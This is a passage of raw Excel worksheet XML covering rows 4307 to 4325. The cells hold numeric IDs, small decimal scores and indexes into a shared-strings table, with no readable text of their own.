      <c r="A4307" s="12">
        <v>99831</v>
      </c>
      <c r="B4307" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D4307" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4307" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4307" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4307" s="12" t="s">
        <v>27665</v>
      </c>
      <c r="H4307" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4307" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4307" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4307" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4307" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4307" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4307" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4307" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4307" s="12" t="s">
        <v>27666</v>
      </c>
      <c r="Q4307" s="16">
        <v>3.1</v>
      </c>
      <c r="R4307" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4307" s="12" t="s">
        <v>27667</v>
      </c>
      <c r="T4307" s="12" t="s">
        <v>76</v>
      </c>
      <c r="U4307" s="12" t="s">
        <v>27668</v>
      </c>
      <c r="V4307" s="12" t="s">
        <v>9956</v>
      </c>
      <c r="W4307" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4307" s="12">
        <v>2</v>
      </c>
      <c r="Y4307" s="12" t="s">
        <v>27669</v>
      </c>
    </row>
    <row r="4308" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4308" s="12">
        <v>100421</v>
      </c>
      <c r="B4308" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4308" s="12" t="s">
        <v>31145</v>
      </c>
      <c r="F4308" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4308" s="12" t="s">
        <v>27676</v>
      </c>
      <c r="H4308" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4308" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4308" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4308" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4308" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4308" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4308" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4308" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4308" s="12" t="s">
        <v>27677</v>
      </c>
      <c r="Q4308" s="12">
        <v>4</v>
      </c>
      <c r="R4308" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4308" s="12" t="s">
        <v>27678</v>
      </c>
      <c r="T4308" s="12" t="s">
        <v>27679</v>
      </c>
      <c r="U4308" s="12" t="s">
        <v>27680</v>
      </c>
      <c r="V4308" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4308" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4308" s="12">
        <v>6</v>
      </c>
      <c r="Y4308" s="12" t="s">
        <v>27681</v>
      </c>
    </row>
    <row r="4309" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4309" s="12">
        <v>100501</v>
      </c>
      <c r="B4309" s="12" t="s">
        <v>30815</v>
      </c>
      <c r="D4309" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4309" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4309" s="12" t="s">
        <v>27682</v>
      </c>
      <c r="H4309" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4309" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4309" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4309" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4309" s="12" t="s">
        <v>26139</v>
      </c>
      <c r="M4309" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4309" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4309" s="12" t="s">
        <v>31592</v>
      </c>
      <c r="P4309" s="12" t="s">
        <v>27683</v>
      </c>
      <c r="Q4309" s="12">
        <v>4</v>
      </c>
      <c r="R4309" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4309" s="12" t="s">
        <v>27684</v>
      </c>
      <c r="T4309" s="12" t="s">
        <v>27685</v>
      </c>
      <c r="U4309" s="12" t="s">
        <v>27686</v>
      </c>
      <c r="V4309" s="12" t="s">
        <v>26805</v>
      </c>
      <c r="W4309" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4309" s="12">
        <v>5</v>
      </c>
      <c r="Y4309" s="12" t="s">
        <v>27687</v>
      </c>
    </row>
    <row r="4310" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4310" s="12">
        <v>100581</v>
      </c>
      <c r="B4310" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4310" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4310" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4310" s="12" t="s">
        <v>29812</v>
      </c>
      <c r="G4310" s="12" t="s">
        <v>27688</v>
      </c>
      <c r="H4310" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4310" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4310" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4310" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4310" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4310" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4310" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4310" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4310" s="12" t="s">
        <v>27689</v>
      </c>
      <c r="Q4310" s="12">
        <v>4</v>
      </c>
      <c r="R4310" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4310" s="12" t="s">
        <v>27690</v>
      </c>
      <c r="T4310" s="12" t="s">
        <v>27691</v>
      </c>
      <c r="U4310" s="12" t="s">
        <v>27668</v>
      </c>
      <c r="V4310" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4310" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4310" s="12">
        <v>31</v>
      </c>
      <c r="Y4310" s="12" t="s">
        <v>27692</v>
      </c>
    </row>
    <row r="4311" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4311" s="12">
        <v>100681</v>
      </c>
      <c r="B4311" s="12" t="s">
        <v>30127</v>
      </c>
      <c r="C4311" s="12" t="s">
        <v>30128</v>
      </c>
      <c r="D4311" s="12" t="s">
        <v>30129</v>
      </c>
      <c r="F4311" s="12" t="s">
        <v>30119</v>
      </c>
      <c r="G4311" s="12" t="s">
        <v>27693</v>
      </c>
      <c r="H4311" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4311" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4311" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K4311" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4311" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4311" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4311" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4311" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4311" s="12" t="s">
        <v>27694</v>
      </c>
      <c r="Q4311" s="12">
        <v>4.2</v>
      </c>
      <c r="R4311" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4311" s="12" t="s">
        <v>27695</v>
      </c>
      <c r="T4311" s="12" t="s">
        <v>27696</v>
      </c>
      <c r="U4311" s="12" t="s">
        <v>27697</v>
      </c>
      <c r="V4311" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W4311" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4311" s="12">
        <v>19</v>
      </c>
      <c r="Y4311" s="12" t="s">
        <v>27698</v>
      </c>
    </row>
    <row r="4312" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4312" s="12">
        <v>101471</v>
      </c>
      <c r="B4312" s="12" t="s">
        <v>30816</v>
      </c>
      <c r="D4312" s="12" t="s">
        <v>30834</v>
      </c>
      <c r="E4312" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4312" s="12" t="s">
        <v>30834</v>
      </c>
      <c r="G4312" s="12" t="s">
        <v>27699</v>
      </c>
      <c r="H4312" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4312" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4312" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="K4312" s="12" t="s">
        <v>19527</v>
      </c>
      <c r="L4312" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4312" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4312" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4312" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4312" s="12" t="s">
        <v>27700</v>
      </c>
      <c r="Q4312" s="12">
        <v>4.2</v>
      </c>
      <c r="R4312" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4312" s="12" t="s">
        <v>27701</v>
      </c>
      <c r="T4312" s="12" t="s">
        <v>27702</v>
      </c>
      <c r="U4312" s="12" t="s">
        <v>27703</v>
      </c>
      <c r="V4312" s="12" t="s">
        <v>27704</v>
      </c>
      <c r="W4312" s="12">
        <v>101361</v>
      </c>
      <c r="X4312" s="12">
        <v>7</v>
      </c>
      <c r="Y4312" s="12" t="s">
        <v>27705</v>
      </c>
    </row>
    <row r="4313" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4313" s="12">
        <v>101521</v>
      </c>
      <c r="B4313" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4313" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4313" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F4313" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4313" s="12" t="s">
        <v>27706</v>
      </c>
      <c r="H4313" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4313" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4313" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4313" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4313" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4313" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4313" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4313" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4313" s="12" t="s">
        <v>27707</v>
      </c>
      <c r="Q4313" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4313" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4313" s="12" t="s">
        <v>27708</v>
      </c>
      <c r="T4313" s="12" t="s">
        <v>2645</v>
      </c>
      <c r="U4313" s="12" t="s">
        <v>27709</v>
      </c>
      <c r="V4313" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4313" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4313" s="12">
        <v>15</v>
      </c>
      <c r="Y4313" s="12" t="s">
        <v>27710</v>
      </c>
    </row>
    <row r="4314" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4314" s="12">
        <v>101961</v>
      </c>
      <c r="B4314" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4314" s="12" t="s">
        <v>30777</v>
      </c>
      <c r="F4314" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4314" s="12" t="s">
        <v>27717</v>
      </c>
      <c r="H4314" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4314" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4314" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4314" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4314" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4314" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4314" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4314" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4314" s="12" t="s">
        <v>27718</v>
      </c>
      <c r="Q4314" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4314" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4314" s="12" t="s">
        <v>27719</v>
      </c>
      <c r="T4314" s="12" t="s">
        <v>21598</v>
      </c>
      <c r="U4314" s="12" t="s">
        <v>27720</v>
      </c>
      <c r="V4314" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4314" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4314" s="12">
        <v>36</v>
      </c>
      <c r="Y4314" s="12" t="s">
        <v>27721</v>
      </c>
    </row>
    <row r="4315" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4315" s="12">
        <v>102261</v>
      </c>
      <c r="B4315" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4315" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4315" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4315" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4315" s="12" t="s">
        <v>27722</v>
      </c>
      <c r="H4315" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4315" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4315" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4315" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4315" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4315" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4315" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4315" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4315" s="12" t="s">
        <v>27723</v>
      </c>
      <c r="Q4315" s="12">
        <v>4</v>
      </c>
      <c r="R4315" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4315" s="12" t="s">
        <v>27724</v>
      </c>
      <c r="T4315" s="12" t="s">
        <v>27725</v>
      </c>
      <c r="U4315" s="12" t="s">
        <v>27726</v>
      </c>
      <c r="V4315" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4315" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4315" s="12">
        <v>28</v>
      </c>
      <c r="Y4315" s="12" t="s">
        <v>27727</v>
      </c>
    </row>
    <row r="4316" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4316" s="12">
        <v>102661</v>
      </c>
      <c r="B4316" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4316" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4316" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4316" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4316" s="12" t="s">
        <v>27728</v>
      </c>
      <c r="H4316" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4316" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4316" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4316" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4316" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4316" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4316" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4316" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4316" s="12" t="s">
        <v>27729</v>
      </c>
      <c r="Q4316" s="12">
        <v>4.2</v>
      </c>
      <c r="R4316" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4316" s="12" t="s">
        <v>27730</v>
      </c>
      <c r="T4316" s="12" t="s">
        <v>27731</v>
      </c>
      <c r="U4316" s="12" t="s">
        <v>27732</v>
      </c>
      <c r="V4316" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4316" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4316" s="12">
        <v>2</v>
      </c>
      <c r="Y4316" s="12" t="s">
        <v>27733</v>
      </c>
    </row>
    <row r="4317" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4317" s="12">
        <v>103721</v>
      </c>
      <c r="B4317" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4317" s="12" t="s">
        <v>31178</v>
      </c>
      <c r="D4317" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4317" s="12" t="s">
        <v>31179</v>
      </c>
      <c r="G4317" s="12" t="s">
        <v>27735</v>
      </c>
      <c r="H4317" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4317" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J4317" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4317" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4317" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4317" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4317" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4317" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4317" s="12" t="s">
        <v>27736</v>
      </c>
      <c r="Q4317" s="12">
        <v>3.19</v>
      </c>
      <c r="R4317" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4317" s="12" t="s">
        <v>27737</v>
      </c>
      <c r="T4317" s="12" t="s">
        <v>27738</v>
      </c>
      <c r="U4317" s="12" t="s">
        <v>27541</v>
      </c>
      <c r="V4317" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W4317" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4317" s="12">
        <v>2</v>
      </c>
      <c r="Y4317" s="12" t="s">
        <v>27739</v>
      </c>
    </row>
    <row r="4318" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4318" s="12">
        <v>104121</v>
      </c>
      <c r="B4318" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4318" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4318" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4318" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4318" s="12" t="s">
        <v>27740</v>
      </c>
      <c r="H4318" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4318" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4318" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4318" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4318" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4318" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4318" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4318" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4318" s="12" t="s">
        <v>27741</v>
      </c>
      <c r="Q4318" s="12">
        <v>4.2</v>
      </c>
      <c r="R4318" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4318" s="12" t="s">
        <v>27742</v>
      </c>
      <c r="T4318" s="12" t="s">
        <v>27743</v>
      </c>
      <c r="U4318" s="12" t="s">
        <v>27744</v>
      </c>
      <c r="V4318" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4318" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4318" s="12">
        <v>38</v>
      </c>
      <c r="Y4318" s="12" t="s">
        <v>27745</v>
      </c>
    </row>
    <row r="4319" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4319" s="12">
        <v>104421</v>
      </c>
      <c r="B4319" s="12" t="s">
        <v>31180</v>
      </c>
      <c r="C4319" s="12" t="s">
        <v>31178</v>
      </c>
      <c r="D4319" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4319" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4319" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4319" s="12" t="s">
        <v>27746</v>
      </c>
      <c r="H4319" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4319" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4319" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K4319" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4319" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4319" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4319" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4319" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4319" s="12" t="s">
        <v>27747</v>
      </c>
      <c r="Q4319" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4319" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4319" s="12" t="s">
        <v>27748</v>
      </c>
      <c r="T4319" s="12" t="s">
        <v>27749</v>
      </c>
      <c r="U4319" s="12" t="s">
        <v>27750</v>
      </c>
      <c r="V4319" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W4319" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4319" s="12">
        <v>4</v>
      </c>
      <c r="Y4319" s="12" t="s">
        <v>27751</v>
      </c>
    </row>
    <row r="4320" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4320" s="12">
        <v>104591</v>
      </c>
      <c r="B4320" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4320" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4320" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4320" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4320" s="12" t="s">
        <v>27752</v>
      </c>
      <c r="H4320" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4320" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4320" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4320" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4320" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M4320" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4320" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4320" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P4320" s="12" t="s">
        <v>27747</v>
      </c>
      <c r="Q4320" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4320" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4320" s="12" t="s">
        <v>27753</v>
      </c>
      <c r="T4320" s="12" t="s">
        <v>27754</v>
      </c>
      <c r="U4320" s="12" t="s">
        <v>27755</v>
      </c>
      <c r="V4320" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4320" s="12">
        <v>104701</v>
      </c>
      <c r="X4320" s="12">
        <v>12</v>
      </c>
      <c r="Y4320" s="12" t="s">
        <v>27756</v>
      </c>
    </row>
    <row r="4321" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4321" s="12">
        <v>104771</v>
      </c>
      <c r="B4321" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4321" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4321" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4321" s="12" t="s">
        <v>27757</v>
      </c>
      <c r="H4321" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4321" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4321" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4321" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4321" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4321" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4321" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4321" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4321" s="12" t="s">
        <v>27747</v>
      </c>
      <c r="Q4321" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4321" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4321" s="12" t="s">
        <v>27758</v>
      </c>
      <c r="T4321" s="12" t="s">
        <v>27759</v>
      </c>
      <c r="U4321" s="12" t="s">
        <v>27760</v>
      </c>
      <c r="V4321" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4321" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4321" s="12">
        <v>69</v>
      </c>
      <c r="Y4321" s="12" t="s">
        <v>27761</v>
      </c>
    </row>
    <row r="4322" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4322" s="12">
        <v>105351</v>
      </c>
      <c r="B4322" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4322" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4322" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4322" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4322" s="12" t="s">
        <v>27762</v>
      </c>
      <c r="H4322" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4322" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4322" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4322" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4322" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4322" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4322" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4322" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4322" s="12" t="s">
        <v>27763</v>
      </c>
      <c r="Q4322" s="12">
        <v>4.3</v>
      </c>
      <c r="R4322" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4322" s="12" t="s">
        <v>27764</v>
      </c>
      <c r="T4322" s="12" t="s">
        <v>27765</v>
      </c>
      <c r="U4322" s="12" t="s">
        <v>27766</v>
      </c>
      <c r="V4322" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4322" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4322" s="12">
        <v>9</v>
      </c>
      <c r="Y4322" s="12" t="s">
        <v>27767</v>
      </c>
    </row>
    <row r="4323" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4323" s="12">
        <v>105761</v>
      </c>
      <c r="B4323" s="12" t="s">
        <v>31181</v>
      </c>
      <c r="C4323" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4323" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4323" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4323" s="12" t="s">
        <v>27768</v>
      </c>
      <c r="H4323" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4323" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4323" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4323" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4323" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4323" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4323" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4323" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4323" s="12" t="s">
        <v>27769</v>
      </c>
      <c r="Q4323" s="12">
        <v>4.2</v>
      </c>
      <c r="R4323" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4323" s="12" t="s">
        <v>27770</v>
      </c>
      <c r="T4323" s="12" t="s">
        <v>27771</v>
      </c>
      <c r="U4323" s="12" t="s">
        <v>27772</v>
      </c>
      <c r="V4323" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4323" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4323" s="12">
        <v>11</v>
      </c>
      <c r="Y4323" s="12" t="s">
        <v>27773</v>
      </c>
    </row>
    <row r="4324" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4324" s="12">
        <v>106181</v>
      </c>
      <c r="B4324" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4324" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4324" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4324" s="12" t="s">
        <v>30359</v>
      </c>
      <c r="G4324" s="12" t="s">
        <v>27778</v>
      </c>
      <c r="H4324" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4324" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4324" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4324" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4324" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4324" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4324" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4324" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4324" s="12">
        <v>4.2</v>
      </c>
      <c r="Q4324" s="12">
        <v>4.2</v>
      </c>
      <c r="R4324" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4324" s="12" t="s">
        <v>27779</v>
      </c>
      <c r="T4324" s="12" t="s">
        <v>26107</v>
      </c>
      <c r="U4324" s="12" t="s">
        <v>27780</v>
      </c>
      <c r="V4324" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4324" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4324" s="12">
        <v>1</v>
      </c>
      <c r="Y4324" s="12" t="s">
        <v>27781</v>
      </c>
    </row>
    <row r="4325" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4325" s="12">
        <v>106371</v>
      </c>
      <c r="B4325" s="12" t="s">
        <v>30612</v>
      </c>
      <c r="C4325" s="12" t="s">
        <v>30583</v>
      </c>
      <c r="D4325" s="12" t="s">
        <v>30614</v>
      </c>
      <c r="E4325" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4325" s="12" t="s">
        <v>30594</v>
      </c>
      <c r="G4325" s="12" t="s">
        <v>27782</v>
      </c>
